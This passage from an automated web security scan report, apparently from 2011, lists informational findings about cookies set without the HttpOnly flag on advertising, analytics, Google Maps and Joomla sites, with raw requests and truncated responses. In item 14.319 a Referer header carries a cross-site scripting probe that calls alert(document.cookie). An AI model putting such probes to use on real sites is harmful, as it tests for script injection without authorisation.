TFF=eJydkDEOwzAIRe%252BSEwC2g8FLjtHVQ4ZK3dotyt1LWjWRnKRFHRDIeg%252FxXRWTTndF0g4hDtDDICLUlaqk01WxWEVO1uA19lLmHY8LHxqerELj8ar5DOsQ%252FbvHy3irj7HZnT%252FGYQqGAQB%252FpLZxz5%252BmxsbjVfMZ1hmcu5ebKKazDHnLkN983HjKKbCc%252FRZ%252BMVEkMP1jBiDm5DV5FX2GvcXkIucn21jBjA%253D%253D; expires=Tue, 24-May-2011 21:06:41 GMT; path=/; domain=.exelator.com
EVX=deleted; expires=Sun, 24-Jan-2010 21:06:40 GMT; path=/; domain=load.exelator.com
EVX=deleted; expires=Sun, 24-Jan-2010 21:06:40 GMT; path=/; domain=loadus.exelator.com
EVX=eJxLtDKyqs60MrIwNTa3tE60MgTxDKyLrQwtrJQMTSxM483jjUxM4w0MDOOBUMm6NtPK2MDI3NyUKMW1ALLGGNA%253D; expires=Tue, 24-May-2011 21:06:41 GMT; path=/; domain=.exelator.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.306. http://magazine.joomla.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://magazine.joomla.org
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

e4ca47a488ed5dc0028ed0df7e92e4e0=9b4bdea32449b3b75368de62daaab55e; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: magazine.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.307. https://maps-api-ssl.google.com/maps previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://maps-api-ssl.google.com
Path:	/maps

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PREF=ID=15465537720298b3:TM=1295908849:LM=1295908849:S=eCJvLriWDbsm79ao; expires=Wed, 23-Jan-2013 22:40:49 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps HTTP/1.1
Host: maps-api-ssl.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.308. http://maps.google.com/maps previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://maps.google.com
Path:	/maps

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PREF=ID=c21edb51d7356cca:TM=1295908855:LM=1295908856:S=PTt96tHXYS63KD3T; expires=Wed, 23-Jan-2013 22:40:56 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps HTTP/1.1
Host: maps.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.309. http://maps.google.com/maps/place previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://maps.google.com
Path:	/maps/place

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PREF=ID=052903314ef8577d:TM=1295908874:LM=1295908874:S=XSf7TWjb_N58vMlP; expires=Wed, 23-Jan-2013 22:41:14 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps/place?hl\\x3den\\x26amp;um\\x3d1\\x26amp;ie\\x3dUTF-8\\x26amp;q\\x3daub\\x26amp;fb\\x3d1\\x26amp;gl\\x3dus\\x26amp;hq\\x3daub\\x26amp;cid\\x3d7028149978956142856\\x22 HTTP/1.1
Host: maps.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.310. http://media.fastclick.net/w/pg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://media.fastclick.net
Path:	/w/pg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pluto=517004695355|v1; domain=.fastclick.net; path=/; expires=Thu, 24-Jan-2013 01:35:49 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.311. http://media.fastclick.net/w/tre previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://media.fastclick.net
Path:	/w/tre

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

lyc=BQAAAARmvzBNACAAARhFIASgAAaUMwAANhwpYBcBvUSgFCAABA49AAAZ4AoXQAABiw7gCS8ADSAvwAABaVrACSAAAksAAA==; domain=.fastclick.net; path=/; expires=Thu, 24-Jan-2013 01:35:47 GMT
pluto=613465378701; domain=.fastclick.net; path=/; expires=Thu, 24-Jan-2013 01:35:47 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.312. http://media.fastclick.net/w/win.bid previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://media.fastclick.net
Path:	/w/win.bid

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

pjw=BAEAAAACIAMDVCk+TSAGAQABIAMCuuoDYAcC6kkHIA1AEwEAAA==; domain=.fastclick.net; path=/; expires=Thu, 27-Jan-2011 01:37:24 GMT
vt=10070:256698:477674:54816:0:1295919444:3|; domain=.fastclick.net; path=/; expires=Thu, 24-Feb-2011 01:37:24 GMT
adv_ic=BwEAAABUKT5NIAYGAAFJAAAbWSAHIAsDAAAAAA==; domain=.fastclick.net; path=/; expires=Wed, 25-Jan-2012 01:37:24 GMT
pluto=517004695355|v1; domain=.fastclick.net; path=/; expires=Thu, 24-Jan-2013 01:37:24 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /w/win.bid?sid=54816&m=1&t=n&tp=5&d=f&mid=477674&EIC=1102509515205556&vch=554879014744&sys=3&evert=498003&vtid=14839&cb=1398482484&asite=2061501907&txid=9eb0b645-887a-48fe-96d9-a8ec0d65be5c&UD=CQAA7FD8nj1AEQAAAID1_gM-GQAAACBWDx8-KAAwAQ&wp=TT4pUwACvIcK5XsjKRZgBOX45riQQ1x_qFMGTg&walsh=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBhNNGUyk-TYf5CqP2lQeEwNnIAqmp2NwBybvEzxX5pf__EQAQARgBIAA4AVCAx-HEBGDJhqOH1KOAEIIBF2NhLXB1Yi0xMTg5MzcwNDA4OTk4NTU1oAGb5-foA7IBDmpvb21sYWNvZGUub3JnugEJNzI4eDkwX2FzyAEJ2gEyaHR0cDovL2pvb21sYWNvZGUub3JnL2dmL3Byb2plY3Qvam9vbWxhL3JlcG9ydGluZy-YAgrAAgTIAr23iA7gAgDqAhdKb29tbGFfSm9vbWxhY29kZUZvb3RlcqgDAegD8gPoA6gG6AM16AO5AugD2gX1AwAAAET1AwIAAADgBAE%26num%3D1%26sig%3DAGiWqtxXfy71xAYmo2tqD6PMiVjHwATbrg%26client%3Dca-pub-1189370408998555%26adurl%3D HTTP/1.1
Host: media.fastclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: zru=1|:1294800534|; lxc=AgAAAASMFi1NACAABHVydDE3IAfgBAADMwAAluAUHwEAAA==; lyc=BQAAAARmvzBNACAAARhFIASgAAaUMwAANhwpYBcBvUSgFCAABA49AAAZ4AoXQAABiw7gCS8ADSAvwAABaVrACSAAAksAAA==; pluto=517004695355|v1

Response

14.313. http://metrics.autobytel.com/b/ss/autobytelcorp/1/H.5-pdv-2/s1332017967011 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://metrics.autobytel.com
Path:	/b/ss/autobytelcorp/1/H.5-pdv-2/s1332017967011

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; Expires=Sat, 23 Jan 2016 21:06:45 GMT; Domain=.autobytel.com; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.314. http://metrics.traderonline.com/b/ss/detraderonline/1/H.17/s93964351669419 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://metrics.traderonline.com
Path:	/b/ss/detraderonline/1/H.17/s93964351669419

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

s_vi=[CS]v1|269ED0D58501209E-6000010F000341E3[CE]; Expires=Sat, 23 Jan 2016 15:58:35 GMT; Domain=.traderonline.com; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.315. http://mig.nexac.com/2/B3DM/DLX/1@x96 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mig.nexac.com
Path:	/2/B3DM/DLX/1@x96

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

OAX=rcHW800+KPMAAfCd; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.nexac.com
NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.316. http://my.joomla.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://my.joomla.org
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

9eaf6601670c0ef4fb11c453b34b19f8=ad1bd55b950dc34700e6681bcc93141e; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: my.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.317. http://network.realmedia.com/RealMedia/ads/adstream_nx.ads/TRACK_Radioshack/Retargeting_Conversionpage_Nonsecure@Bottom3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_nx.ads/TRACK_Radioshack/Retargeting_Conversionpage_Nonsecure@Bottom3

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

RMFL=011PhXoxU10EfJ|U10Eo1|U10166E; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
NXCLICK2=011PhXoxNX_TRACK_Radioshack/Retargeting_Conversionpage_Nonsecure!y!B3!166E!1MSss; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
NSC_o1efm_qppm_iuuq=ffffffff09499e0e45525d5f4f58455e445a4a423660;expires=Tue, 25-Jan-2011 01:36:47 GMT;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.318. http://news.webshots.com/photo/1059414821042998563QWNlxQ/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://news.webshots.com
Path:	/photo/1059414821042998563QWNlxQ/x22

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

AB_ID=5829807500397041135; domain=.webshots.com; path=/; expires=Sun, 19-Jan-2031 22:44:08 GMT
NSC_ed3-xt-bqq-cbdlfoe-mc=e24d345029a0;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /photo/1059414821042998563QWNlxQ/x22 HTTP/1.1
Host: news.webshots.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.319. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/NaN/1930644746@Top,x01,x02,x03,x04,x05,Middle,Right1,Right2,Left,Left1,Left2,Left3,Bottom,Bottom1,Bottom2,Bottom3,BottomRight previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/NaN/1930644746@Top,x01,x02,x03,x04,x05,Middle,Right1,Right2,Left,Left1,Left2,Left3,Bottom,Bottom1,Bottom2,Bottom3,BottomRight

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/NaN/1930644746@Top,x01,x02,x03,x04,x05,Middle,Right1,Right2,Left,Left1,Left2,Left3,Bottom,Bottom1,Bottom2,Bottom3,BottomRight HTTP/1.1
Host: oasc05139.247realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.parenthood.com/?d1907'-alert(document.cookie)-'807a8eb3eff=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW8003BLsABpSl

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:23:40 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 6257
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Bottom') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/NaN/542573873/Bottom/default/empty.gif/7263485738303033
...[SNIP]...

14.320. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1029279147@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1029279147@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1029279147@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:56:20 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4864
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1961884465/Middle
...[SNIP]...

14.321. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1033534934@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1033534934@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1033534934@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:53:41 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4265
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1371072572/Middle
...[SNIP]...

14.322. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1044316774@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1044316774@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1044316774@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 03:01:25 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4330
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1769617372/Middle
...[SNIP]...

14.323. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1046826505@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1046826505@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1046826505@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:58:27 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4537
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1498623288/Middle
...[SNIP]...

14.324. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1047418271@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1047418271@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1047418271@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 03:01:53 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4292
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/907715433/Middle/
...[SNIP]...

14.325. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1055977740@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1055977740@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1055977740@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:56:24 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4263
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/782277154/Middle/
...[SNIP]...

14.326. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1079026132@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1079026132@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1079026132@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:58:17 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4334
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1140430199/Middle
...[SNIP]...

14.327. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1116487764@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1116487764@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1116487764@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:59:03 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4551
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
